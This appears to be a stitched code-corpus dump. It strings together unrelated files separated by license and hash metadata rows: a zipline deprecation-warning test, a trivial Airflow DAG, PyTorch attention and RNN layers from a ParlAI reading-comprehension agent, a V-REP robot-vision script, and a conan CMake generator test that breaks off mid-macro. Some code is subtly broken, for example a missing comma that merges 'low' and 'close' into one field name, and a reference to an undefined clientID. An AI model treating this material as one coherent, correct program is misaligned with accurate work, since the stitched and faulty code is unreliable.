ZiplineTestCase):
START_DATE = pd.Timestamp("2016-01-05", tz='UTC')
END_DATE = pd.Timestamp("2016-01-28", tz='UTC')
SIM_PARAMS_DATA_FREQUENCY = 'minute'
sids = ASSET_FINDER_EQUITY_SIDS = 1, 2, 3
@classmethod
def make_equity_minute_bar_data(cls):
for sid in cls.sids:
yield sid, create_minute_df_for_asset(
cls.trading_calendar,
cls.SIM_PARAMS_START,
cls.SIM_PARAMS_END,
)
@classmethod
def make_equity_daily_bar_data(cls, country_code, sids):
for sid in sids:
yield sid, create_daily_df_for_asset(
cls.trading_calendar,
cls.SIM_PARAMS_START,
cls.SIM_PARAMS_END,
)
@classmethod
def make_splits_data(cls):
return pd.DataFrame([
{
'effective_date': str_to_seconds('2016-01-06'),
'ratio': 0.5,
'sid': 3,
}
])
@classmethod
def make_adjustment_writer_equity_daily_bar_reader(cls):
return MockDailyBarReader(
dates=cls.nyse_calendar.sessions_in_range(
cls.START_DATE,
cls.END_DATE,
),
)
@classmethod
def init_class_fixtures(cls):
super(TestAPIShim, cls).init_class_fixtures()
cls.asset1 = cls.asset_finder.retrieve_asset(1)
cls.asset2 = cls.asset_finder.retrieve_asset(2)
cls.asset3 = cls.asset_finder.retrieve_asset(3)
def create_algo(self, code, filename=None, sim_params=None):
if sim_params is None:
sim_params = self.sim_params
return self.make_algo(
script=code,
sim_params=sim_params,
algo_filename=filename
)
def test_old_new_data_api_paths(self):
"""
Test that the new and old data APIs hit the same code paths.
We want to ensure that the old data API(data[sid(N)].field and
similar) and the new data API(data.current(sid(N), field) and
similar) hit the same code paths on the DataPortal.
"""
test_start_minute = self.trading_calendar.minutes_for_session(
self.sim_params.sessions[0]
)[1]
test_end_minute = self.trading_calendar.minutes_for_session(
self.sim_params.sessions[0]
)[-1]
bar_data = self.create_bardata(
lambda: test_end_minute,
)
ohlcvp_fields = [
"open",
"high",
"low"
"close",
"volume",
"price",
]
spot_value_meth = 'zipline.data.data_portal.DataPortal.get_spot_value'
def assert_get_spot_value_called(fun, field):
"""
Assert that get_spot_value was called during the execution of fun.
Takes in a function fun and a string field.
"""
with patch(spot_value_meth) as gsv:
fun()
gsv.assert_called_with(
self.asset1,
field,
test_end_minute,
'minute'
)
# Ensure that data.current(sid(n), field) has the same behaviour as
# data[sid(n)].field.
for field in ohlcvp_fields:
assert_get_spot_value_called(
lambda: getattr(bar_data[self.asset1], field),
field,
)
assert_get_spot_value_called(
lambda: bar_data.current(self.asset1, field),
field,
)
history_meth = 'zipline.data.data_portal.DataPortal.get_history_window'
def assert_get_history_window_called(fun, is_legacy):
"""
Assert that get_history_window was called during fun().
Takes in a function fun and a boolean is_legacy.
"""
with patch(history_meth) as ghw:
fun()
# Slightly hacky, but done to get around the fact that
                # history() explicitly passes an ffill param as the last arg,
# while data.history doesn't.
if is_legacy:
ghw.assert_called_with(
[self.asset1, self.asset2, self.asset3],
test_end_minute,
5,
"1m",
"volume",
"minute",
True
)
else:
ghw.assert_called_with(
[self.asset1, self.asset2, self.asset3],
test_end_minute,
5,
"1m",
"volume",
"minute",
)
test_sim_params = SimulationParameters(
start_session=test_start_minute,
end_session=test_end_minute,
data_frequency="minute",
trading_calendar=self.trading_calendar,
)
history_algorithm = self.create_algo(
history_algo,
sim_params=test_sim_params
)
assert_get_history_window_called(
lambda: history_algorithm.run(),
is_legacy=True
)
assert_get_history_window_called(
lambda: bar_data.history(
[self.asset1, self.asset2, self.asset3],
"volume",
5,
"1m"
),
is_legacy=False
)
def test_sid_accessor(self):
"""
Test that we maintain backwards compat for sid access on a data object.
We want to support both data[sid(24)].sid, as well as
data[sid(24)]["sid"]. Since these are deprecated and will eventually
cease to be supported, we also want to assert that we're seeing a
deprecation warning.
"""
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("ignore", PerformanceWarning)
warnings.simplefilter("default", ZiplineDeprecationWarning)
algo = self.create_algo(sid_accessor_algo)
algo.run()
# Since we're already raising a warning on doing data[sid(x)],
# we don't want to raise an extra warning on data[sid(x)].sid.
self.assertEqual(2, len(w))
# Check that both the warnings raised were in fact
# ZiplineDeprecationWarnings
for warning in w:
self.assertEqual(
ZiplineDeprecationWarning,
warning.category
)
self.assertEqual(
"`data[sid(N)]` is deprecated. Use `data.current`.",
str(warning.message)
)
def test_data_items(self):
"""
Test that we maintain backwards compat for data.[items | iteritems].
We also want to assert that we warn that iterating over the assets
in `data` is deprecated.
"""
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("ignore", PerformanceWarning)
warnings.simplefilter("default", ZiplineDeprecationWarning)
algo = self.create_algo(data_items_algo)
algo.run()
self.assertEqual(4, len(w))
for idx, warning in enumerate(w):
self.assertEqual(
ZiplineDeprecationWarning,
warning.category
)
if idx % 2 == 0:
self.assertEqual(
"Iterating over the assets in `data` is deprecated.",
str(warning.message)
)
else:
self.assertEqual(
"`data[sid(N)]` is deprecated. Use `data.current`.",
str(warning.message)
)
def test_iterate_data(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("ignore", PerformanceWarning)
warnings.simplefilter("default", ZiplineDeprecationWarning)
algo = self.create_algo(simple_algo)
algo.run()
self.assertEqual(4, len(w))
line_nos = [warning.lineno for warning in w]
self.assertEqual(4, len(set(line_nos)))
for idx, warning in enumerate(w):
self.assertEqual(ZiplineDeprecationWarning,
warning.category)
self.assertEqual("<string>", warning.filename)
self.assertEqual(line_nos[idx], warning.lineno)
if idx < 2:
self.assertEqual(
"Checking whether an asset is in data is deprecated.",
str(warning.message)
)
else:
self.assertEqual(
"Iterating over the assets in `data` is deprecated.",
str(warning.message)
)
def test_history(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("ignore", PerformanceWarning)
warnings.simplefilter("default", ZiplineDeprecationWarning)
sim_params = self.sim_params.create_new(
self.sim_params.sessions[1],
self.sim_params.end_session
)
algo = self.create_algo(history_algo,
sim_params=sim_params)
algo.run()
self.assertEqual(1, len(w))
self.assertEqual(ZiplineDeprecationWarning, w[0].category)
self.assertEqual("<string>", w[0].filename)
self.assertEqual(8, w[0].lineno)
self.assertEqual("The `history` method is deprecated. Use "
"`data.history` instead.", str(w[0].message))
def test_old_new_history_bts_paths(self):
"""
Tests that calling history in before_trading_start gets us the correct
values, which involves 1) calling data_portal.get_history_window as of
the previous market minute, 2) getting adjustments between the previous
market minute and the current time, and 3) applying those adjustments
"""
algo = self.create_algo(history_bts_algo)
algo.run()
expected_vol_without_split = np.arange(386, 391) * 100
expected_vol_with_split = np.arange(386, 391) * 200
window = algo.recorded_vars['history']
np.testing.assert_array_equal(window[self.asset1].values,
expected_vol_without_split)
np.testing.assert_array_equal(window[self.asset2].values,
expected_vol_without_split)
np.testing.assert_array_equal(window[self.asset3].values,
expected_vol_with_split)
def test_simple_transforms(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("ignore", PerformanceWarning)
warnings.simplefilter("default", ZiplineDeprecationWarning)
sim_params = SimulationParameters(
start_session=self.sim_params.sessions[8],
end_session=self.sim_params.sessions[-1],
data_frequency="minute",
trading_calendar=self.trading_calendar,
)
algo = self.create_algo(simple_transforms_algo,
sim_params=sim_params)
algo.run()
self.assertEqual(8, len(w))
transforms = ["mavg", "vwap", "stddev", "returns"]
for idx, line_no in enumerate(range(8, 12)):
warning1 = w[idx * 2]
warning2 = w[(idx * 2) + 1]
self.assertEqual("<string>", warning1.filename)
self.assertEqual("<string>", warning2.filename)
self.assertEqual(line_no, warning1.lineno)
self.assertEqual(line_no, warning2.lineno)
self.assertEqual("`data[sid(N)]` is deprecated. Use "
"`data.current`.",
str(warning1.message))
self.assertEqual("The `{0}` method is "
"deprecated.".format(transforms[idx]),
str(warning2.message))
# now verify the transform values
# minute price
# 2016-01-11 14:31:00+00:00 1561
# ...
# 2016-01-14 20:59:00+00:00 3119
# 2016-01-14 21:00:00+00:00 3120
# 2016-01-15 14:31:00+00:00 3121
# 2016-01-15 14:32:00+00:00 3122
# 2016-01-15 14:33:00+00:00 3123
# volume
# 2016-01-11 14:31:00+00:00 156100
# ...
# 2016-01-14 20:59:00+00:00 311900
# 2016-01-14 21:00:00+00:00 312000
# 2016-01-15 14:31:00+00:00 312100
# 2016-01-15 14:32:00+00:00 312200
# 2016-01-15 14:33:00+00:00 312300
# daily price (last day built with minute data)
# 2016-01-14 00:00:00+00:00 9
# 2016-01-15 00:00:00+00:00 3123
# mavg = average of all the prices = (1561 + 3123) / 2 = 2342
# vwap = sum(price * volume) / sum(volumes)
# = 889119531400.0 / 366054600.0
# = 2428.9259891830343
# stddev = stddev(price, ddof=1) = 451.3435498597493
# returns = (todayprice - yesterdayprice) / yesterdayprice
# = (3123 - 9) / 9 = 346
self.assertEqual(2342, algo.mavg)
self.assertAlmostEqual(2428.92599, algo.vwap, places=5)
self.assertAlmostEqual(451.34355, algo.stddev, places=5)
self.assertAlmostEqual(346, algo.returns)
def test_manipulation(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("ignore", PerformanceWarning)
warnings.simplefilter("default", ZiplineDeprecationWarning)
algo = self.create_algo(simple_algo)
algo.run()
self.assertEqual(4, len(w))
for idx, warning in enumerate(w):
self.assertEqual("<string>", warning.filename)
self.assertEqual(7 + idx, warning.lineno)
if idx < 2:
self.assertEqual("Checking whether an asset is in data is "
"deprecated.",
str(warning.message))
else:
self.assertEqual("Iterating over the assets in `data` is "
"deprecated.",
str(warning.message))
def test_reference_empty_position_by_int(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("default", ZiplineDeprecationWarning)
algo = self.create_algo(reference_missing_position_by_int_algo)
algo.run()
self.assertEqual(1, len(w))
self.assertEqual(
str(w[0].message),
"Referencing positions by integer is deprecated. Use an asset "
"instead."
)
def test_reference_empty_position_by_unexpected_type(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("default", ZiplineDeprecationWarning)
algo = self.create_algo(
reference_missing_position_by_unexpected_type_algo
)
algo.run()
self.assertEqual(1, len(w))
self.assertEqual(
str(w[0].message),
"Position lookup expected a value of type Asset but got str"
" instead."
)
| apache-2.0 | 2,449,032,300,358,231,600 | 32.730496 | 79 | 0.539687 | false |
google/framework-for-osdu | osdu-r2/os-dags/other-log-ingest.py | 1 | 1161 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import airflow
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from datetime import timedelta
default_args = {
'start_date': airflow.utils.dates.days_ago(0),
'retries': 1,
'retry_delay': timedelta(minutes=50)
}
dag = DAG(
'Other_log_ingest',
default_args=default_args,
description='liveness monitoring dag',
schedule_interval=None,
dagrun_timeout=timedelta(minutes=60))
t1 = BashOperator(
task_id='echo',
bash_command='echo test',
dag=dag,
depends_on_past=False,
priority_weight=2**31-1)
| apache-2.0 | 6,901,343,015,972,973,000 | 29.552632 | 75 | 0.722653 | false |
calee88/ParlAI | parlai/agents/drqa_msmarco/layers.py | 1 | 17185 | # Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
import pdb
#torch.backends.cudnn.enabled=False
# ------------------------------------------------------------------------------
# Modules
# ------------------------------------------------------------------------------
class Selective_Meanpool(nn.Module):
def __init__(self, input_size):
super(Selective_Meanpool, self).__init__()
self.input_size = input_size
def forward(self, x, word_end):
"""Mean pool across word boundary."""
# x : N x Tword x H (32 x 500 x 768)
# word_end : word end index of each paragraph, list
nBatch = len(word_end)
maxSent = len(max(word_end, key=len))
outputs = []
#pdb.set_trace()
for n in range(nBatch):
outputs_batch = []
startend = np.insert(word_end[n], 0, -1)
nSentence = len(startend)-1
#start_idx = Variable(torch.from_numpy(startend[:-1]) + 1) # Variable,
#end_idx = Variable(torch.from_numpy(startend[1:]) ) # Variable
start_idx = startend[:-1] + 1 # numpy.array
end_idx = startend[1:] # numpy.array
for s in range(nSentence):
end_idx_real = end_idx[s]+1
if end_idx_real < 0 :
end_idx_real = x.size()[1]
meanpool_idx = torch.from_numpy(np.arange(start_idx[s], end_idx_real))
meanpool_idx = Variable(meanpool_idx.cuda(async=True))
outputs_batch.append(torch.mean(x[n,:, :].index_select(0, meanpool_idx),0))
if nSentence < maxSent: # zero tensor padding
outputs_batch.append(Variable(torch.zeros(maxSent-nSentence, x.size()[-1]).cuda(async=True), requires_grad=False))
outputs_batch_tensor = torch.cat(outputs_batch, 0)
outputs.append(outputs_batch_tensor)
#pdb.set_trace()
output = torch.stack(outputs, 0)
return output
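# Hedged usage sketch (editor's addition, sizes are illustrative only):
# Selective_Meanpool averages hidden states within the word/sentence spans
# given by word_end, one span array per batch element.
#   pool = Selective_Meanpool(input_size=768)
#   x = Variable(torch.randn(2, 500, 768).cuda())    # (batch, time, hidden)
#   word_end = [np.array([9, 19, 499]), np.array([4, 499])]
#   out = pool(x, word_end)                          # -> (2, max_sentences, 768)
# Note: the implementation above builds indices with .cuda(), so it assumes
# the input lives on the GPU.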
class StackedBRNN(nn.Module):
def __init__(self, input_size, hidden_size, num_layers,
dropout_rate=0, dropout_output=False, rnn_type=nn.LSTM,
concat_layers=False, padding=False):
super(StackedBRNN, self).__init__()
self.padding = padding
self.dropout_output = dropout_output
self.dropout_rate = dropout_rate
self.num_layers = num_layers
self.concat_layers = concat_layers
self.rnns = nn.ModuleList()
for i in range(num_layers):
input_size = input_size if i == 0 else 2 * hidden_size
self.rnns.append(rnn_type(input_size, hidden_size,
num_layers=1,
bidirectional=True))
def forward(self, x, x_mask):
"""Can choose to either handle or ignore variable length sequences.
Always handle padding in eval.
"""
# No padding necessary.
if x_mask.data.sum() == 0:
return self._forward_unpadded(x, x_mask)
# Pad if we care or if its during eval.
if self.padding or not self.training:
return self._forward_padded(x, x_mask)
# We don't care.
return self._forward_unpadded(x, x_mask)
def _forward_unpadded(self, x, x_mask):
"""Faster encoding that ignores any padding."""
#pdb.set_trace()
# Transpose batch and sequence dims
x = x.transpose(0, 1)
# Encode all layers
outputs = [x]
for i in range(self.num_layers):
rnn_input = outputs[-1]
# Apply dropout to hidden input
if self.dropout_rate > 0:
rnn_input = F.dropout(rnn_input,
p=self.dropout_rate,
training=self.training)
# Forward
rnn_output = self.rnns[i](rnn_input)[0]
outputs.append(rnn_output)
# Concat hidden layers
if self.concat_layers:
output = torch.cat(outputs[1:], 2)
else:
output = outputs[-1]
# Transpose back
output = output.transpose(0, 1)
# Dropout on output layer
if self.dropout_output and self.dropout_rate > 0:
output = F.dropout(output,
p=self.dropout_rate,
training=self.training)
return output
def _forward_padded(self, x, x_mask):
"""Slower (significantly), but more precise,
encoding that handles padding."""
# Compute sorted sequence lengths
lengths = x_mask.data.eq(0).long().sum(1).squeeze()
_, idx_sort = torch.sort(lengths, dim=0, descending=True)
_, idx_unsort = torch.sort(idx_sort, dim=0)
lengths = list(lengths[idx_sort])
idx_sort = Variable(idx_sort)
idx_unsort = Variable(idx_unsort)
# Sort x
x = x.index_select(0, idx_sort)
# Transpose batch and sequence dims
x = x.transpose(0, 1)
# Pack it up
rnn_input = nn.utils.rnn.pack_padded_sequence(x, lengths)
# Encode all layers
outputs = [rnn_input]
for i in range(self.num_layers):
rnn_input = outputs[-1]
# Apply dropout to input
if self.dropout_rate > 0:
dropout_input = F.dropout(rnn_input.data,
p=self.dropout_rate,
training=self.training)
rnn_input = nn.utils.rnn.PackedSequence(dropout_input,
rnn_input.batch_sizes)
outputs.append(self.rnns[i](rnn_input)[0])
# Unpack everything
for i, o in enumerate(outputs[1:], 1):
outputs[i] = nn.utils.rnn.pad_packed_sequence(o)[0]
# Concat hidden layers or take final
if self.concat_layers:
output = torch.cat(outputs[1:], 2)
else:
output = outputs[-1]
# Transpose and unsort
output = output.transpose(0, 1)
output = output.index_select(0, idx_unsort)
# Dropout on output layer
if self.dropout_output and self.dropout_rate > 0:
output = F.dropout(output,
p=self.dropout_rate,
training=self.training)
return output
class SeqAttnMatch(nn.Module):
"""Given sequences X and Y, match sequence Y to each element in X.
* o_i = sum(alpha_j * y_j) for i in X
* alpha_j = softmax(y_j * x_i)
"""
def __init__(self, input_size, identity=False):
super(SeqAttnMatch, self).__init__()
if not identity:
self.linear = nn.Linear(input_size, input_size)
else:
self.linear = None
def forward(self, x, y, y_mask):
"""Input shapes:
x = batch * len1 * h
y = batch * len2 * h
y_mask = batch * len2
Output shapes:
matched_seq = batch * len1 * h
"""
#pdb.set_trace()
# Project vectors
if self.linear:
x_proj = self.linear(x.view(-1, x.size(2))).view(x.size())
x_proj = F.relu(x_proj)
y_proj = self.linear(y.view(-1, y.size(2))).view(y.size())
y_proj = F.relu(y_proj)
else:
x_proj = x
y_proj = y
# Compute scores
scores = x_proj.bmm(y_proj.transpose(2, 1))
# Mask padding
y_mask = y_mask.unsqueeze(1).expand(scores.size())
scores.data.masked_fill_(y_mask.data, -float('inf'))
# Normalize with softmax
alpha_flat = F.softmax(scores.view(-1, y.size(1)))
alpha = alpha_flat.view(-1, x.size(1), y.size(1))
# Take weighted average
matched_seq = alpha.bmm(y)
return matched_seq
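# Hedged shape example (editor's addition): SeqAttnMatch attends the question
# representation y over every passage position in x. With batch=32, len1=400,
# len2=30 and h=128:
#   attn = SeqAttnMatch(input_size=128)
#   matched = attn(x, y, y_mask)   # x: 32x400x128, y: 32x30x128, y_mask: 32x30
#   # matched: 32 x 400 x 128; y_mask marks padded question positions (1 = pad)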
class BilinearSeqAttn(nn.Module):
"""A bilinear attention layer over a sequence X w.r.t y:
* o_i = softmax(x_i'Wy) for x_i in X.
Optionally don't normalize output weights.
"""
def __init__(self, x_size, y_size, identity=False):
super(BilinearSeqAttn, self).__init__()
if not identity:
self.linear = nn.Linear(y_size, x_size)
else:
self.linear = None
def forward(self, x, y, x_mask):
"""
x = batch * len * h1
y = batch * h2
x_mask = batch * len
"""
#pdb.set_trace()
Wy = self.linear(y) if self.linear is not None else y
xWy = x.bmm(Wy.unsqueeze(2)).squeeze(2)
xWy.data.masked_fill_(x_mask.data, -float('inf'))
if self.training:
# In training we output log-softmax for NLL
alpha = F.log_softmax(xWy)
else:
# ...Otherwise 0-1 probabilities
alpha = F.softmax(xWy)
return alpha
class LinearSeqAttn(nn.Module):
"""Self attention over a sequence:
* o_i = softmax(Wx_i) for x_i in X.
"""
def __init__(self, input_size):
super(LinearSeqAttn, self).__init__()
self.linear = nn.Linear(input_size, 1)
def forward(self, x, x_mask):
"""
x = batch * len * hdim
x_mask = batch * len
"""
x_flat = x.view(-1, x.size(-1))
scores = self.linear(x_flat).view(x.size(0), x.size(1))
scores.data.masked_fill_(x_mask.data, -float('inf'))
alpha = F.softmax(scores)
return alpha
class GatedAttentionBilinearRNN(nn.Module):
"""Given sequences X and Y, match sequence Y to each element in X. --- eq(4) in r-net
(X=passage u^P, Y=Question u^Q)
* alpha^t_i = softmax(u^Q_j * Wu * u^P_i)
* c_t = sum(alpha^t_i * u^Q_i) for i in X
* gated[u^P_t, c_t] = sigmoid(W_g * [u^P_t, c_t])
* v^P_t = RNN(v^P_(t-1), gated[u^P_t, c_t])
"""
def __init__(self, x_size, y_size, hidden_size,
rnn_type=nn.LSTM,
gate=True, padding = False,
birnn=False, identity=False, concat=False, rnn=True):
super(GatedAttentionBilinearRNN, self).__init__()
self.num_layers = 1
self.hidden_size = hidden_size
self.padding = padding
self.concat_layers = concat
#pdb.set_trace()
if not identity:
self.linear = nn.Linear(y_size, x_size, bias=False)
else:
self.linear = None
self.gate = gate
if self.gate:
self.gate_layer = nn.Sequential(
nn.Linear(y_size + x_size, 1, bias=False ), # the 2nd hidden_size can be different from 'hidden_size'
nn.Sigmoid())
if not (hidden_size == (x_size+y_size)):
#self.bottleneck_layer = nn.Sequential(nn.Linear(y_size + x_size, hidden_size),
#nn.ReLU())
self.bottleneck_layer = nn.Linear(y_size + x_size, hidden_size)
input_size = hidden_size
else:
self.bottleneck_layer = None
input_size = y_size + x_size
self.rnn = rnn
if self.rnn:
self.rnns = nn.ModuleList()
self.rnns.append(rnn_type(input_size, hidden_size,
num_layers=1, bidirectional=birnn))
def forward(self, x, x_mask, y, y_mask):
"""Can choose to either handle or ignore variable length sequences.
Always handle padding in eval.
"""
# No padding necessary.
if x_mask.data.sum() == 0:
return self._forward_unpadded(x, x_mask, y, y_mask)
# Pad if we care or if its during eval.
if self.padding or not self.training:
return self._forward_padded(x, x_mask, y, y_mask)
# return self._forward_unpadded(x, x_mask, y, y_mask)
# We don't care.
return self._forward_unpadded(x, x_mask, y, y_mask)
def _gated_attended_input(self, x, x_mask, y, y_mask):
nbatch = x.size(0) #(batch, seq_len, input_size)
x_len = x.size(1)
y_len = y.size(1)
x_size = x.size(2)
y_size = y.size(2)
#tic = time.time()
# Attention
# * alpha^t_i = softmax(tanh( u^Q_j * W * u^P_i ))
# * c_t = sum(alpha^t_i * u^Q_i) for i in X
#pdb.set_trace()
Wy = self.linear(y.view(-1, y_size)).view(-1, y_len, x_size) if self.linear is not None else y
xWy = x.bmm(Wy.transpose(1,2))
xWy.data.masked_fill_(y_mask.data.unsqueeze(1).expand_as(xWy), -float('inf'))
alpha = F.softmax(xWy.view(-1, y_len))
# Ver1 (Problem : .repeat())
#pdb.set_trace()
#alpha = alpha.view(alpha.size(0), 1, y_len)
#attend_y = alpha.bmm(y.unsqueeze(1).repeat(1,x_len,1,1).view(nbatch*x_len, y_len,-1)).view(nbatch, x_len, -1) # HR ver1
# Ver2 -- get exactly same value as Ver1
alpha = alpha.view(nbatch, x_len, y_len)
attend_y = alpha.bmm(y)
#pdb.set_trace()
attend_y.data.masked_fill_(x_mask.unsqueeze(2).expand_as(attend_y).data, 0) ## comment out?
rnn_input = torch.cat((x, attend_y), 2)
# Gate: gated[u^P_t, c_t] = sigmoid(W_g * [u^P_t, c_t])
if self.gate:
gate = self.gate_layer(rnn_input.view(-1, rnn_input.size(2))).view(nbatch, x_len, 1).expand_as(rnn_input) #1, 1, rnn_input.size(2))
rnn_input = gate.mul(rnn_input)
# 128*3 *2= 1536 ==> too large as an RNN input? then insert a bottle neck layer
rnn_input = self.bottleneck_layer(rnn_input.view(-1, rnn_input.size(2))).view(nbatch, x_len, -1) if self.bottleneck_layer is not None else rnn_input
return rnn_input
def _forward_unpadded(self, x, x_mask, y, y_mask):
"""Faster encoding that ignores any padding."""
# Encode all layers
output = self._gated_attended_input(x, x_mask, y, y_mask)
# pdb.set_trace()
if self.rnn:
outputs = [output]
for i in range(self.num_layers): ## self.num_layers == 1
# RNN: v^P_t = RNN(v^P_(t-1), gated[u^P_t, c_t])
rnn_output = self.rnns[i](outputs[-1].transpose(0,1))[0] # batch_first = False
outputs.append(rnn_output)
output = outputs[1].transpose(0,1)
# Concat hidden layers
if self.concat_layers:
output = torch.cat((output, x), 2)
return output
def _forward_padded(self, x, x_mask, y, y_mask):
"""Slower (significantly), but more precise,
encoding that handles padding."""
# Compute sorted sequence lengths
lengths = x_mask.data.eq(0).long().sum(1).squeeze()
_, idx_sort = torch.sort(lengths, dim=0, descending=True)
_, idx_unsort = torch.sort(idx_sort, dim=0)
lengths = list(lengths[idx_sort])
idx_sort = Variable(idx_sort)
idx_unsort = Variable(idx_unsort)
input = self._gated_attended_input(x, x_mask, y, y_mask)
if self.rnn:
# Sort x
input = input.index_select(0, idx_sort)
# Transpose batch and sequence dims
input = input.transpose(0, 1)
# Pack it up
rnn_input = nn.utils.rnn.pack_padded_sequence(input, lengths)
# Encode all layers
outputs = [rnn_input]
for i in range(self.num_layers):
rnn_input = outputs[-1]
outputs.append(self.rnns[i](rnn_input)[0])
# Unpack everything
for i, o in enumerate(outputs[1:], 1):
outputs[i] = nn.utils.rnn.pad_packed_sequence(o)[0]
# Transpose and unsort
output = outputs[1].transpose(0, 1)
output = output.index_select(0, idx_unsort)
else:
output = input
# Concat hidden layers or take final
if self.concat_layers:
output = torch.cat((output, x), 2)
return output
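# Hedged usage sketch (editor's addition): the gated-attention layer matches
# question states y against passage states x and re-encodes the gated result
# with an RNN, following eq. (4) of R-Net. Sizes below are illustrative only:
#   layer = GatedAttentionBilinearRNN(x_size=256, y_size=256, hidden_size=256,
#                                     rnn_type=nn.LSTM, birnn=False)
#   v_p = layer(x, x_mask, y, y_mask)   # x: B x Tp x 256, y: B x Tq x 256
#   # v_p: B x Tp x 256 (wider if birnn=True or concat=True)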
# ------------------------------------------------------------------------------
# Functional
# ------------------------------------------------------------------------------
def uniform_weights(x, x_mask):
"""Return uniform weights over non-masked input."""
alpha = Variable(torch.ones(x.size(0), x.size(1)))
if x.data.is_cuda:
alpha = alpha.cuda()
alpha = alpha * x_mask.eq(0).float()
alpha = alpha / alpha.sum(1).expand(alpha.size())
return alpha
def weighted_avg(x, weights):
"""x = batch * len * d
weights = batch * len
"""
return weights.unsqueeze(1).bmm(x).squeeze(1)
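# Hedged combined example (editor's addition): LinearSeqAttn produces weights
# over a sequence and weighted_avg collapses the sequence with them.
#   self_attn = LinearSeqAttn(input_size=128)
#   alpha = self_attn(q_hidden, q_mask)     # B x len
#   q_vec = weighted_avg(q_hidden, alpha)   # B x 128
# uniform_weights() can be used instead of self_attn when a parameter-free
# average over the unmasked positions is wanted.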
| bsd-3-clause | -1,450,149,187,795,908,400 | 34.360082 | 164 | 0.526622 | false |
EricssonResearch/scott-eu | simulation-ros/src/turtlebot2i/turtlebot2i_warehouse/src/simple_object_extractor.py | 1 | 1874 | #!/usr/bin/env python
from SceneObjectExtractor import SceneObjectExtractor
import time
import vrep
# Update rate in seconds
rate = 0.1
extractor = SceneObjectExtractor('127.0.0.1', 19997)
# List of object names to retrieve information
# For now it is hardcoded
extractor.set_static_obj_names(['fake_obj', 'stairs', 'slidingDoor',
'DockStationBody', 'DockStationBody#0',\
'ConveyorBeltBody', 'ConveyorBeltBody#0', 'ConveyorBeltBody#1',
'ShelfBody', 'ShelfBody#0', 'ShelfBody#1'])
extractor.set_dynamic_obj_names(['Bill#3', 'product', 'fake_obj'])
extractor.set_robot_names(['turtlebot2i', 'turtlebot2i#0'])
print('Connected to remote API server')
print('Getting scene properties (this can take a while)...')
# Get all objects info once (for static properties)
extractor.operation_mode = vrep.simx_opmode_oneshot_wait
extractor.get_all_objects_info()
print('Finished getting scene properties!\n')
print('Started getting scene objects from vision sensor FOV...')
while True:
# Get dynamic object info (pose and vel) periodically
extractor.update_dynamic_obj_info()
# Update vision sensor info
extractor.update_all_robots_vision_sensors_fov()
# Get objects that are in the sensor FOV
for robot in extractor.robot_obj_list:
obj_list = extractor.get_objects_from_vision_sensor(robot.vision_sensor)
if (obj_list != None):
# Remove the robot itself from the list
obj_list = [i for i in obj_list if i.name!=robot.name]
# Print detected objects of the vision sensor
print(robot.name, robot.vision_sensor.name, obj_list)
#time.sleep(rate)
#vrep.simxStartSimulation(extractor.clientID, vrep.simx_opmode_blocking);
# Close the connection to V-REP
vrep.simxFinish(clientID)
| apache-2.0 | 809,577,537,197,511,800 | 33.072727 | 96 | 0.680896 | false |
Xaltotun/conan | conans/test/generators/cmake_test.py | 1 | 2742 | import re
import unittest
from conans.model.settings import Settings
from conans.model.conan_file import ConanFile
from conans.client.generators.cmake import CMakeGenerator
from conans.model.build_info import DepsCppInfo
from conans.model.ref import ConanFileReference
class CMakeGeneratorTest(unittest.TestCase):
def _extract_macro(self, name, text):
pattern = ".*(macro\(%s\).*?endmacro\(\)).*" % name
return re.sub(pattern, r"\1", text, flags=re.DOTALL)
def variables_setup_test(self):
conanfile = ConanFile(None, None, Settings({}), None)
ref = ConanFileReference.loads("MyPkg/0.1@lasote/stables")
cpp_info = DepsCppInfo()
cpp_info.defines = ["MYDEFINE1"]
conanfile.deps_cpp_info.update(cpp_info, ref)
ref = ConanFileReference.loads("MyPkg2/0.1@lasote/stables")
cpp_info = DepsCppInfo()
cpp_info.defines = ["MYDEFINE2"]
conanfile.deps_cpp_info.update(cpp_info, ref)
generator = CMakeGenerator(conanfile)
content = generator.content
cmake_lines = content.splitlines()
self.assertIn("set(CONAN_DEFINES_MYPKG -DMYDEFINE1)", cmake_lines)
self.assertIn("set(CONAN_DEFINES_MYPKG2 -DMYDEFINE2)", cmake_lines)
self.assertIn("set(CONAN_COMPILE_DEFINITIONS_MYPKG MYDEFINE1)", cmake_lines)
self.assertIn("set(CONAN_COMPILE_DEFINITIONS_MYPKG2 MYDEFINE2)", cmake_lines)
def aux_cmake_test_setup_test(self):
conanfile = ConanFile(None, None, Settings({}), None)
generator = CMakeGenerator(conanfile)
aux_cmake_test_setup = generator._aux_cmake_test_setup()
# extract the conan_basic_setup macro
macro = self._extract_macro("conan_basic_setup", aux_cmake_test_setup)
self.assertEqual("""macro(conan_basic_setup)
conan_check_compiler()
conan_output_dirs_setup()
conan_set_find_library_paths()
if(NOT "${ARGV0}" STREQUAL "TARGETS")
message(STATUS "Conan: Using cmake global configuration")
conan_global_flags()
else()
message(STATUS "Conan: Using cmake targets configuration")
conan_define_targets()
endif()
conan_set_rpath()
conan_set_vs_runtime()
conan_set_libcxx()
conan_set_find_paths()
endmacro()""", macro)
# extract the conan_set_find_paths macro
macro = self._extract_macro("conan_set_find_paths", aux_cmake_test_setup)
self.assertEqual("""macro(conan_set_find_paths)
# CMake can find findXXX.cmake files in the root of packages
